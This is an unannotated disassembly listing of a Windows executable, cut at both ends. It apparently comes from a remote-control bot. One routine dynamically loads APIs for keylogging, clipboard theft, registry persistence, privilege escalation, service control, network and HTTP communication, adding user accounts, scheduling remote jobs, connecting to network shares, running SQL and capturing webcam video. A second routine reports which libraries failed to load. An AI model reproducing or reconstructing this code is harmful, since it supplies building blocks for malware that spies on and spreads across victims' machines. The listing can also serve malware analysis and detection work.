push edi
mov dword_441468, eax
call esi ; GetProcAddress
push offset aGetclipboardda ; "GetClipboardData"
push edi
mov dword_441388, eax
call esi ; GetProcAddress
push offset aCloseclipboard ; "CloseClipboard"
push edi
mov dword_4413A8, eax
call esi ; GetProcAddress
push offset aExitwindowsex ; "ExitWindowsEx"
push edi
mov dword_44140C, eax
call esi ; GetProcAddress
cmp dword_441414, ebx
mov dword_441300, eax
jz short loc_409982
cmp dword_4413C4, ebx
jz short loc_409982
cmp dword_441358, ebx
jz short loc_409982
cmp dword_441468, ebx
jz short loc_409982
cmp dword_441388, ebx
jz short loc_409982
cmp dword_4413A8, ebx
jz short loc_409982
cmp dword_44140C, ebx
jz short loc_409982
cmp eax, ebx
jnz short loc_40998C
loc_409982: ; CODE XREF: sub_409794+1B8�j
; sub_409794+1C0�j ...
mov dword_441480, 1
loc_40998C: ; CODE XREF: sub_409794+1EC�j
push offset aGetasynckeysta ; "GetAsyncKeyState"
push edi
call esi ; GetProcAddress
push offset aGetkeystate ; "GetKeyState"
push edi
mov dword_441384, eax
call esi ; GetProcAddress
push offset aGetwindowtexta ; "GetWindowTextA"
push edi
mov dword_441298, eax
call esi ; GetProcAddress
push offset aGetforegroundw ; "GetForegroundWindow"
push edi
mov dword_441354, eax
call esi ; GetProcAddress
cmp dword_441384, ebx
mov dword_441340, eax
jz short loc_4099E9
cmp dword_441298, ebx
jz short loc_4099E9
cmp dword_441354, ebx
jz short loc_4099E9
cmp eax, ebx
jnz short loc_4099F3
jmp short loc_4099E9
; ---------------------------------------------------------------------------
loc_4099DE: ; CODE XREF: sub_409794+144�j
nop
call near ptr 7C910331h
mov dword_441484, eax
loc_4099E9: ; CODE XREF: sub_409794+232�j
; sub_409794+23A�j ...
mov dword_441480, 1
loc_4099F3: ; CODE XREF: sub_409794+246�j
push offset aAdvapi32_dll ; "advapi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_409B8E
push offset aRegopenkeyexa ; "RegOpenKeyExA"
push edi
call esi ; GetProcAddress
push offset aRegcreatekeyex ; "RegCreateKeyExA"
push edi
mov dword_441428, eax
call esi ; GetProcAddress
push offset aRegsetvalueexa ; "RegSetValueExA"
push edi
mov dword_44136C, eax
call esi ; GetProcAddress
push offset aRegqueryvaluee ; "RegQueryValueExA"
push edi
mov dword_4413DC, eax
call esi ; GetProcAddress
push offset aRegdeletevalue ; "RegDeleteValueA"
push edi
mov dword_4412C4, eax
call esi ; GetProcAddress
push offset aRegclosekey ; "RegCloseKey"
push edi
mov dword_441324, eax
call esi ; GetProcAddress
cmp dword_441428, ebx
mov dword_441394, eax
jz short loc_409A7E
cmp dword_44136C, ebx
jz short loc_409A7E
cmp dword_4413DC, ebx
jz short loc_409A7E
cmp dword_4412C4, ebx
jz short loc_409A7E
cmp dword_441324, ebx
jz short loc_409A7E
cmp eax, ebx
jnz short loc_409A88
loc_409A7E: ; CODE XREF: sub_409794+2C4�j
; sub_409794+2CC�j ...
mov dword_441488, 1
loc_409A88: ; CODE XREF: sub_409794+2E8�j
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
mov dword_44139C, eax
call esi ; GetProcAddress
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
mov dword_441374, eax
call esi ; GetProcAddress
cmp dword_44139C, ebx
mov dword_441424, eax
jz short loc_409AC3
cmp dword_441374, ebx
jz short loc_409AC3
cmp eax, ebx
jnz short loc_409ACD
loc_409AC3: ; CODE XREF: sub_409794+321�j
; sub_409794+329�j
mov dword_441488, 1
loc_409ACD: ; CODE XREF: sub_409794+32D�j
push offset aOpenscmanagera ; "OpenSCManagerA"
push edi
call esi ; GetProcAddress
push offset aOpenservicea ; "OpenServiceA"
push edi
mov dword_4413AC, eax
call esi ; GetProcAddress
push offset aStartservicea ; "StartServiceA"
push edi
mov dword_4412A0, eax
call esi ; GetProcAddress
push offset aControlservice ; "ControlService"
push edi
mov dword_4412A8, eax
call esi ; GetProcAddress
push offset aDeleteservice ; "DeleteService"
push edi
mov dword_441308, eax
call esi ; GetProcAddress
push offset aCloseserviceha ; "CloseServiceHandle"
push edi
mov dword_44130C, eax
call esi ; GetProcAddress
push offset aEnumservicesst ; "EnumServicesStatusA"
push edi
mov dword_4412BC, eax
call esi ; GetProcAddress
push offset aIsvalidsecurit ; "IsValidSecurityDescriptor"
push edi
mov dword_441378, eax
call esi ; GetProcAddress
cmp dword_4413AC, ebx
mov dword_4412AC, eax
jz short loc_409B71
cmp dword_4412A0, ebx
jz short loc_409B71
cmp dword_4412A8, ebx
jz short loc_409B71
cmp dword_441308, ebx
jz short loc_409B71
cmp dword_44130C, ebx
jz short loc_409B71
cmp dword_4412BC, ebx
jz short loc_409B71
cmp dword_441378, ebx
jz short loc_409B71
cmp eax, ebx
jnz short loc_409B7B
loc_409B71: ; CODE XREF: sub_409794+3A7�j
; sub_409794+3AF�j ...
mov dword_441488, 1
loc_409B7B: ; CODE XREF: sub_409794+3DB�j
push offset aGetusernamea ; "GetUserNameA"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_4412A4, eax
jnz short loc_409BA3
jmp short loc_409B99
; ---------------------------------------------------------------------------
loc_409B8E: ; CODE XREF: sub_409794+26A�j
nop
call near ptr 7C910331h
mov dword_44148C, eax
loc_409B99: ; CODE XREF: sub_409794+3F8�j
mov dword_441488, 1
loc_409BA3: ; CODE XREF: sub_409794+3F6�j
push offset aGdi32_dll ; "gdi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_409C6F
push offset aCreatedca ; "CreateDCA"
push edi
call esi ; GetProcAddress
push offset aCreatedibsecti ; "CreateDIBSection"
push edi
mov dword_4413A4, eax
call esi ; GetProcAddress
push offset aCreatecompatib ; "CreateCompatibleDC"
push edi
mov dword_4413FC, eax
call esi ; GetProcAddress
push offset aGetdevicecaps ; "GetDeviceCaps"
push edi
mov dword_441404, eax
call esi ; GetProcAddress
push offset aGetdibcolortab ; "GetDIBColorTable"
push edi
mov dword_4413C0, eax
call esi ; GetProcAddress
push offset aSelectobject ; "SelectObject"
push edi
mov dword_4412E8, eax
call esi ; GetProcAddress
push offset aBitblt ; "BitBlt"
push edi
mov dword_441294, eax
call esi ; GetProcAddress
push offset aDeletedc ; "DeleteDC"
push edi
mov dword_441400, eax
call esi ; GetProcAddress
push offset aDeleteobject ; "DeleteObject"
push edi
mov dword_441280, eax
call esi ; GetProcAddress
cmp dword_4413A4, ebx
mov dword_44131C, eax
jz short loc_409C7A
cmp dword_4413FC, ebx
jz short loc_409C7A
cmp dword_441404, ebx
jz short loc_409C7A
cmp dword_4413C0, ebx
jz short loc_409C7A
cmp dword_4412E8, ebx
jz short loc_409C7A
cmp dword_441294, ebx
jz short loc_409C7A
cmp dword_441400, ebx
jz short loc_409C7A
cmp dword_441280, ebx
jz short loc_409C7A
cmp eax, ebx
jnz short loc_409C84
jmp short loc_409C7A
; ---------------------------------------------------------------------------
loc_409C6F: ; CODE XREF: sub_409794+41A�j
nop
call near ptr 7C910331h
mov dword_441494, eax
loc_409C7A: ; CODE XREF: sub_409794+49B�j
; sub_409794+4A3�j ...
mov dword_441490, 1
loc_409C84: ; CODE XREF: sub_409794+4D7�j
mov ebp, dword_4210DC
push offset aWs2_32_dll ; "ws2_32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_409F40
push offset aWsastartup ; "WSAStartup"
push edi
call esi ; GetProcAddress
push offset aWsasocketa ; "WSASocketA"
push edi
mov dword_441330, eax
call esi ; GetProcAddress
push offset aWsaasyncselect ; "WSAAsyncSelect"
push edi
mov dword_44145C, eax
call esi ; GetProcAddress
push offset a__wsafdisset ; "__WSAFDIsSet"
push edi
mov dword_4412D4, eax
call esi ; GetProcAddress
push offset aWsaioctl ; "WSAIoctl"
push edi
mov dword_4412B0, eax
call esi ; GetProcAddress
push offset aWsagetlasterro ; "WSAGetLastError"
push edi
mov dword_441364, eax
call esi ; GetProcAddress
push offset aWsacleanup ; "WSACleanup"
push edi
mov dword_44134C, eax
call esi ; GetProcAddress
push offset aSocket ; "socket"
push edi
mov dword_441318, eax
call esi ; GetProcAddress
push offset aIoctlsocket ; "ioctlsocket"
push edi
mov dword_441438, eax
call esi ; GetProcAddress
push offset aConnect ; "connect"
push edi
mov dword_441454, eax
call esi ; GetProcAddress
push offset aInet_ntoa ; "inet_ntoa"
push edi
mov dword_441360, eax
call esi ; GetProcAddress
push offset aInet_addr ; "inet_addr"
push edi
mov dword_441444, eax
call esi ; GetProcAddress
push offset aHtons ; "htons"
push edi
mov dword_4413F8, eax
call esi ; GetProcAddress
push offset aHtonl ; "htonl"
push edi
mov dword_4413B8, eax
call esi ; GetProcAddress
push offset aNtohs ; "ntohs"
push edi
mov dword_4413B4, eax
call esi ; GetProcAddress
push offset aNtohl ; "ntohl"
push edi
mov dword_4412F4, eax
call esi ; GetProcAddress
push offset aSend ; "send"
push edi
mov dword_4412EC, eax
call esi ; GetProcAddress
push offset aSendto ; "sendto"
push edi
mov dword_441408, eax
call esi ; GetProcAddress
push offset aRecv ; "recv"
push edi
mov dword_44141C, eax
call esi ; GetProcAddress
push offset aRecvfrom ; "recvfrom"
push edi
mov dword_4413D0, eax
call esi ; GetProcAddress
mov dword_441390, eax
push offset aBind ; "bind"
push edi
call esi ; GetProcAddress
push offset aSelect ; "select"
push edi
mov dword_4413E4, eax
call esi ; GetProcAddress
push offset aListen ; "listen"
push edi
mov dword_4413A0, eax
call esi ; GetProcAddress
push offset aAccept ; "accept"
push edi
mov dword_4413E0, eax
call esi ; GetProcAddress
push offset aSetsockopt ; "setsockopt"
push edi
mov dword_44144C, eax
call esi ; GetProcAddress
push offset aGetsockname ; "getsockname"
push edi
mov dword_441398, eax
call esi ; GetProcAddress
push offset aGethostname ; "gethostname"
push edi
mov dword_44135C, eax
call esi ; GetProcAddress
push offset aGethostbyname ; "gethostbyname"
push edi
mov dword_4413CC, eax
call esi ; GetProcAddress
push offset aGethostbyaddr ; "gethostbyaddr"
push edi
mov dword_44143C, eax
call esi ; GetProcAddress
push offset aGetpeername ; "getpeername"
push edi
mov dword_441370, eax
call esi ; GetProcAddress
push offset aClosesocket ; "closesocket"
push edi
mov dword_441314, eax
call esi ; GetProcAddress
cmp dword_441330, ebx
mov dword_441450, eax
jz loc_409F4B
cmp dword_44145C, ebx
jz loc_409F4B
cmp dword_4412D4, ebx
jz loc_409F4B
cmp dword_441364, ebx
jz loc_409F4B
cmp dword_44134C, ebx
jz loc_409F4B
cmp dword_441318, ebx
jz loc_409F4B
cmp dword_441438, ebx
jz loc_409F4B
cmp dword_441454, ebx
jz loc_409F4B
cmp dword_441360, ebx
jz loc_409F4B
cmp dword_441444, ebx
jz loc_409F4B
cmp dword_4413F8, ebx
jz loc_409F4B
cmp dword_4413B8, ebx
jz loc_409F4B
cmp dword_4413B4, ebx
jz loc_409F4B
cmp dword_4412F4, ebx
jz short loc_409F4B
cmp dword_441408, ebx
jz short loc_409F4B
cmp dword_44141C, ebx
jz short loc_409F4B
cmp dword_4413D0, ebx
jz short loc_409F4B
cmp dword_441390, ebx
jz short loc_409F4B
cmp dword_4413E4, ebx
jz short loc_409F4B
cmp dword_4413A0, ebx
jz short loc_409F4B
cmp dword_4413E0, ebx
jz short loc_409F4B
cmp dword_44144C, ebx
jz short loc_409F4B
cmp dword_441398, ebx
jz short loc_409F4B
cmp dword_44135C, ebx
jz short loc_409F4B
cmp dword_4413CC, ebx
jz short loc_409F4B
cmp dword_44143C, ebx
jz short loc_409F4B
cmp dword_441370, ebx
jz short loc_409F4B
cmp eax, ebx
jnz short loc_409F55
jmp short loc_409F4B
; ---------------------------------------------------------------------------
loc_409F40: ; CODE XREF: sub_409794+501�j
nop
call near ptr 7C910331h
mov dword_44149C, eax
loc_409F4B: ; CODE XREF: sub_409794+6A0�j
; sub_409794+6AC�j ...
mov dword_441498, 1
loc_409F55: ; CODE XREF: sub_409794+7A8�j
push offset aWininet_dll ; "wininet.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40A05A
push offset aInternetgetcon ; "InternetGetConnectedState"
push edi
call esi ; GetProcAddress
push offset aInternetgetc_0 ; "InternetGetConnectedStateEx"
push edi
mov dword_4412FC, eax
call esi ; GetProcAddress
push offset aHttpopenreques ; "HttpOpenRequestA"
push edi
mov dword_441288, eax
call esi ; GetProcAddress
push offset aHttpsendreques ; "HttpSendRequestA"
push edi
mov dword_441380, eax
call esi ; GetProcAddress
push offset aInternetconnec ; "InternetConnectA"
push edi
mov dword_441334, eax
call esi ; GetProcAddress
push offset aInternetopena ; "InternetOpenA"
push edi
mov dword_44138C, eax
call esi ; GetProcAddress
push offset aInternetopenur ; "InternetOpenUrlA"
push edi
mov dword_441350, eax
call esi ; GetProcAddress
push offset aInternetcracku ; "InternetCrackUrlA"
push edi
mov dword_4412C8, eax
call esi ; GetProcAddress
push offset aInternetreadfi ; "InternetReadFile"
push edi
mov dword_4412C0, eax
call esi ; GetProcAddress
push offset aInternetcloseh ; "InternetCloseHandle"
push edi
mov dword_4412D0, eax
call esi ; GetProcAddress
cmp dword_4412FC, ebx
mov ecx, dword_441350
mov dword_4413EC, eax
jz short loc_40A036
cmp dword_441288, ebx
jz short loc_40A036
cmp dword_441380, ebx
jz short loc_40A036
cmp dword_441334, ebx
jz short loc_40A036
cmp dword_44138C, ebx
jz short loc_40A036
cmp ecx, ebx
jz short loc_40A036
cmp dword_4412C8, ebx
jz short loc_40A036
cmp dword_4412C0, ebx
jz short loc_40A036
cmp dword_4412D0, ebx
jz short loc_40A036
cmp eax, ebx
jnz short loc_40A040
loc_40A036: ; CODE XREF: sub_409794+860�j
; sub_409794+868�j ...
mov dword_4414A0, 1
loc_40A040: ; CODE XREF: sub_409794+8A0�j
cmp ecx, ebx
jz short loc_40A075
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible)"
call ecx ; InternetOpenA
cmp eax, ebx
mov dword_441368, eax
jnz short loc_40A075
jmp short loc_40A06F
; ---------------------------------------------------------------------------
loc_40A05A: ; CODE XREF: sub_409794+7CC�j
nop
call near ptr 7C910331h
mov dword_4414A4, eax
mov dword_4414A0, 1
loc_40A06F: ; CODE XREF: sub_409794+8C4�j
mov dword_441368, ebx
loc_40A075: ; CODE XREF: sub_409794+8AE�j
; sub_409794+8C2�j
push offset aIcmp_dll ; "icmp.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A0BF
push offset aIcmpcreatefile ; "IcmpCreateFile"
push edi
call esi ; GetProcAddress
push offset aIcmpclosehandl ; "IcmpCloseHandle"
push edi
mov dword_441344, eax
call esi ; GetProcAddress
push offset aIcmpsendecho ; "IcmpSendEcho"
push edi
mov dword_441470, eax
call esi ; GetProcAddress
cmp dword_441344, ebx
mov dword_4412DC, eax
jz short loc_40A0CA
cmp dword_441470, ebx
jz short loc_40A0CA
cmp eax, ebx
jnz short loc_40A0D4
jmp short loc_40A0CA
; ---------------------------------------------------------------------------
loc_40A0BF: ; CODE XREF: sub_409794+8EC�j
nop
call near ptr 7C910331h
mov dword_4414AC, eax
loc_40A0CA: ; CODE XREF: sub_409794+91B�j
; sub_409794+923�j ...
mov dword_4414A8, 1
loc_40A0D4: ; CODE XREF: sub_409794+927�j
push offset aNetapi32_dll ; "netapi32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40A1CA
push offset aNetshareadd ; "NetShareAdd"
push edi
call esi ; GetProcAddress
push offset aNetsharedel ; "NetShareDel"
push edi
mov dword_4412B8, eax
call esi ; GetProcAddress
push offset aNetshareenum ; "NetShareEnum"
push edi
mov dword_441290, eax
call esi ; GetProcAddress
push offset aNetschedulejob ; "NetScheduleJobAdd"
push edi
mov dword_441304, eax
call esi ; GetProcAddress
push offset aNetapibufferfr ; "NetApiBufferFree"
push edi
mov dword_441338, eax
call esi ; GetProcAddress
push offset aNetremotetod ; "NetRemoteTOD"
push edi
mov dword_441448, eax
call esi ; GetProcAddress
push offset aNetuseradd ; "NetUserAdd"
push edi
mov dword_4412F0, eax
call esi ; GetProcAddress
push offset aNetuserdel ; "NetUserDel"
push edi
mov dword_44129C, eax
call esi ; GetProcAddress
push offset aNetuserenum ; "NetUserEnum"
push edi
mov dword_44128C, eax
call esi ; GetProcAddress
push offset aNetusergetinfo ; "NetUserGetInfo"
push edi
mov dword_441320, eax
call esi ; GetProcAddress
push offset aNetmessagebuff ; "NetMessageBufferSend"
push edi
mov dword_441410, eax
call esi ; GetProcAddress
cmp dword_4412B8, ebx
mov dword_4413C8, eax
jz short loc_40A1D5
cmp dword_441290, ebx
jz short loc_40A1D5
cmp dword_441304, ebx
jz short loc_40A1D5
cmp dword_441338, ebx
jz short loc_40A1D5
cmp dword_441448, ebx
jz short loc_40A1D5
cmp dword_4412F0, ebx
jz short loc_40A1D5
cmp dword_44129C, ebx
jz short loc_40A1D5
cmp dword_44128C, ebx
jz short loc_40A1D5
cmp dword_441320, ebx
jz short loc_40A1D5
cmp dword_441410, ebx
jz short loc_40A1D5
cmp eax, ebx
jnz short loc_40A1DF
jmp short loc_40A1D5
; ---------------------------------------------------------------------------
loc_40A1CA: ; CODE XREF: sub_409794+94B�j
nop
call near ptr 7C910331h
mov dword_4414B4, eax
loc_40A1D5: ; CODE XREF: sub_409794+9E6�j
; sub_409794+9EE�j ...
mov dword_4414B0, 1
loc_40A1DF: ; CODE XREF: sub_409794+A32�j
push offset aDnsapi_dll ; "dnsapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A214
push offset aDnsflushresolv ; "DnsFlushResolverCache"
push edi
call esi ; GetProcAddress
push offset aDnsflushreso_0 ; "DnsFlushResolverCacheEntry_A"
push edi
mov dword_4412E0, eax
call esi ; GetProcAddress
cmp dword_4412E0, ebx
mov dword_4413B0, eax
jz short loc_40A21F
cmp eax, ebx
jnz short loc_40A229
jmp short loc_40A21F
; ---------------------------------------------------------------------------
loc_40A214: ; CODE XREF: sub_409794+A56�j
nop
call near ptr 7C910331h
mov dword_4414BC, eax
loc_40A21F: ; CODE XREF: sub_409794+A78�j
; sub_409794+A7E�j
mov dword_4414B8, 1
loc_40A229: ; CODE XREF: sub_409794+A7C�j
push offset aIphlpapi_dll ; "iphlpapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A25E
push offset aGetipnettable ; "GetIpNetTable"
push edi
call esi ; GetProcAddress
push offset aDeleteipnetent ; "DeleteIpNetEntry"
push edi
mov dword_441434, eax
call esi ; GetProcAddress
cmp dword_441434, ebx
mov dword_441430, eax
jz short loc_40A269
cmp eax, ebx
jnz short loc_40A273
jmp short loc_40A269
; ---------------------------------------------------------------------------
loc_40A25E: ; CODE XREF: sub_409794+AA0�j
nop
call near ptr 7C910331h
mov dword_4414C4, eax
loc_40A269: ; CODE XREF: sub_409794+AC2�j
; sub_409794+AC8�j
mov dword_4414C0, 1
loc_40A273: ; CODE XREF: sub_409794+AC6�j
push offset aMpr_dll ; "mpr.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A2D2
push offset aWnetaddconnect ; "WNetAddConnection2A"
push edi
call esi ; GetProcAddress
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push edi
mov dword_441460, eax
call esi ; GetProcAddress
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push edi
mov dword_441458, eax
call esi ; GetProcAddress
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push edi
mov dword_441420, eax
call esi ; GetProcAddress
cmp dword_441460, ebx
mov dword_4412F8, eax
jz short loc_40A2DD
cmp dword_441458, ebx
jz short loc_40A2DD
cmp dword_441420, ebx
jz short loc_40A2DD
cmp eax, ebx
jnz short loc_40A2E7
jmp short loc_40A2DD
; ---------------------------------------------------------------------------
loc_40A2D2: ; CODE XREF: sub_409794+AEA�j
nop
call near ptr 7C910331h
mov dword_4414CC, eax
loc_40A2DD: ; CODE XREF: sub_409794+B26�j
; sub_409794+B2E�j ...
mov dword_4414C8, 1
loc_40A2E7: ; CODE XREF: sub_409794+B3A�j
push offset aShell32_dll ; "shell32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A31C
push offset aShellexecutea ; "ShellExecuteA"
push edi
call esi ; GetProcAddress
push offset aShchangenotify ; "SHChangeNotify"
push edi
mov dword_44132C, eax
call esi ; GetProcAddress
cmp dword_44132C, ebx
mov dword_44142C, eax
jz short loc_40A327
cmp eax, ebx
jnz short loc_40A331
jmp short loc_40A327
; ---------------------------------------------------------------------------
loc_40A31C: ; CODE XREF: sub_409794+B5E�j
nop
call near ptr 7C910331h
mov dword_4414D4, eax
loc_40A327: ; CODE XREF: sub_409794+B80�j
; sub_409794+B86�j
mov dword_4414D0, 1
loc_40A331: ; CODE XREF: sub_409794+B84�j
push offset aOdbc32_dll ; "odbc32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A3BA
push offset aSqldriverconne ; "SQLDriverConnect"
push edi
call esi ; GetProcAddress
push offset aSqlsetenvattr ; "SQLSetEnvAttr"
push edi
mov dword_4413F4, eax
call esi ; GetProcAddress
push offset aSqlexecdirect ; "SQLExecDirect"
push edi
mov dword_441440, eax
call esi ; GetProcAddress
push offset aSqlallochandle ; "SQLAllocHandle"
push edi
mov dword_44137C, eax
call esi ; GetProcAddress
push offset aSqlfreehandle ; "SQLFreeHandle"
push edi
mov dword_44133C, eax
call esi ; GetProcAddress
push offset aSqldisconnect ; "SQLDisconnect"
push edi
mov dword_4413D4, eax
call esi ; GetProcAddress
cmp dword_4413F4, ebx
mov dword_441348, eax
jz short loc_40A3C5
cmp dword_441440, ebx
jz short loc_40A3C5
cmp dword_44137C, ebx
jz short loc_40A3C5
cmp dword_44133C, ebx
jz short loc_40A3C5
cmp dword_4413D4, ebx
jz short loc_40A3C5
cmp eax, ebx
jnz short loc_40A3CF
jmp short loc_40A3C5
; ---------------------------------------------------------------------------
loc_40A3BA: ; CODE XREF: sub_409794+BA8�j
nop
call near ptr 7C910331h
mov dword_4414DC, eax
loc_40A3C5: ; CODE XREF: sub_409794+BFE�j
; sub_409794+C06�j ...
mov dword_4414D8, 1
loc_40A3CF: ; CODE XREF: sub_409794+C22�j
push offset aAvicap32_dll ; "avicap32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40A404
push offset aCapcreatecaptu ; "capCreateCaptureWindowA"
push edi
call esi ; GetProcAddress
push offset aCapgetdriverde ; "capGetDriverDescriptionA"
push edi
mov dword_441310, eax
call esi ; GetProcAddress
cmp dword_441310, ebx
mov dword_4413E8, eax
jz short loc_40A40F
cmp eax, ebx
jnz short loc_40A419
jmp short loc_40A40F
; ---------------------------------------------------------------------------
loc_40A404: ; CODE XREF: sub_409794+C46�j
nop
call near ptr 7C910331h
mov dword_4414E4, eax
loc_40A40F: ; CODE XREF: sub_409794+C68�j
; sub_409794+C6E�j
mov dword_4414E0, 1
loc_40A419: ; CODE XREF: sub_409794+C6C�j
push 1
pop eax
pop edi
pop esi
pop ebp
pop ebx
retn
sub_409794 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A421 proc near ; CODE XREF: sub_40F6F1+58FF�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_4]
push esi
xor esi, esi
cmp dword_441478, esi
push edi
mov edi, [ebp+arg_8]
jz short loc_40A469
push dword_44147C
lea eax, [ebp+var_200]
push offset aKernel32_dllFa ; "Kernel32.dll failed. <%d>"
push eax
call sub_4173AC
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40DC10
add esp, 20h
loc_40A469: ; CODE XREF: sub_40A421+1A�j
cmp dword_441480, esi
jz short loc_40A49D
push dword_441484
lea eax, [ebp+var_200]
push offset aUser32_dllFail ; "User32.dll failed. <%d>"
push eax
call sub_4173AC
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40DC10
add esp, 20h
loc_40A49D: ; CODE XREF: sub_40A421+4E�j
cmp dword_441488, esi
jz short loc_40A4D1
push dword_44148C
lea eax, [ebp+var_200]
push offset aAdvapi32_dllFa ; "Advapi32.dll failed. <%d>"
push eax
call sub_4173AC
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40DC10
add esp, 20h
loc_40A4D1: ; CODE XREF: sub_40A421+82�j
cmp dword_441490, esi
jz short loc_40A505
push dword_441494
lea eax, [ebp+var_200]
push offset aGdi32_dllFaile ; "Gdi32.dll failed. <%d>"
push eax
call sub_4173AC
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40DC10
add esp, 20h
loc_40A505: ; CODE XREF: sub_40A421+B6�j
cmp dword_441498, esi
jz short loc_40A539
push dword_44149C
lea eax, [ebp+var_200]
push offset aWs2_32_dllFail ; "Ws2_32.dll failed. <%d>"
push eax
call sub_4173AC
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40DC10
add esp, 20h
loc_40A539: ; CODE XREF: sub_40A421+EA�j
cmp dword_4414A0, esi
jz short loc_40A56D
push dword_4414A4
lea eax, [ebp+var_200]
push offset aWininet_dllFai ; "Wininet.dll failed. <%d>"
push eax
call sub_4173AC
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40DC10
add esp, 20h
loc_40A56D: ; CODE XREF: sub_40A421+11E�j
cmp dword_4414A8, esi
jz short loc_40A5A1
push dword_4414AC
lea eax, [ebp+var_200]
push offset aIcmp_dllFailed ; "Icmp.dll failed. <%d>"
push eax
call sub_4173AC
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40DC10
add esp, 20h
loc_40A5A1: ; CODE XREF: sub_40A421+152�j
cmp dword_4414B0, esi
jz short loc_40A5D5
push dword_4414B4
lea eax, [ebp+var_200]
push offset aNetapi32_dllFa ; "Netapi32.dll failed. <%d>"
push eax
call sub_4173AC
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40DC10
add esp, 20h
loc_40A5D5: ; CODE XREF: sub_40A421+186�j
cmp dword_4414B8, esi
jz short loc_40A609
push dword_4414BC
lea eax, [ebp+var_200]
push offset aDnsapi_dllFail ; "Dnsapi.dll failed. <%d>"
push eax
call sub_4173AC
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40DC10
add esp, 20h
loc_40A609: ; CODE XREF: sub_40A421+1BA�j
cmp dword_4414C0, esi
jz short loc_40A63D
push dword_4414C4
lea eax, [ebp+var_200]
push offset aIphlpapi_dllFa ; "Iphlpapi.dll failed. <%d>"
push eax
call sub_4173AC
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40DC10
add esp, 20h
loc_40A63D: ; CODE XREF: sub_40A421+1EE�j
cmp dword_4414C8, esi
jz short loc_40A671
push dword_4414CC
lea eax, [ebp+var_200]
push offset aMpr32_dllFaile ; "Mpr32.dll failed. <%d>"
push eax
call sub_4173AC
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40DC10
add esp, 20h
loc_40A671: ; CODE XREF: sub_40A421+222�j
cmp dword_4414D0, esi
jz short loc_40A6A5
push dword_4414D4
lea eax, [ebp+var_200]
push offset aShell32_dllFai ; "Shell32.dll failed. <%d>"
push eax
call sub_4173AC
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40DC10
add esp, 20h
loc_40A6A5: ; CODE XREF: sub_40A421+256�j
cmp dword_4414D8, esi
jz short loc_40A6D9
push dword_4414DC
lea eax, [ebp+var_200]
push offset aOdbc32_dllFail ; "Odbc32.dll failed. <%d>"
push eax
call sub_4173AC
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40DC10
add esp, 20h
loc_40A6D9: ; CODE XREF: sub_40A421+28A�j
cmp dword_4414E0, esi
jz short loc_40A70D
push dword_4414E4
lea eax, [ebp+var_200]
push offset aAvicap32_dllFa ; "Avicap32.dll failed. <%d>"
push eax
call sub_4173AC
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40DC10
add esp, 20h
loc_40A70D: ; CODE XREF: sub_40A421+2BE�j
lea eax, [ebp+var_200]
push offset unk_42B6E4
push eax
call sub_4173AC
cmp [ebp+arg_C], esi
pop ecx
pop ecx
jnz short loc_40A73A
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40DC10
add esp, 14h
loc_40A73A: ; CODE XREF: sub_40A421+302�j
lea eax, [ebp+var_200]
push eax
call sub_40C4F7
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_40A421 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A74C proc near ; CODE XREF: sub_40F6F1+C56�p
; sub_40F6F1+C8A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
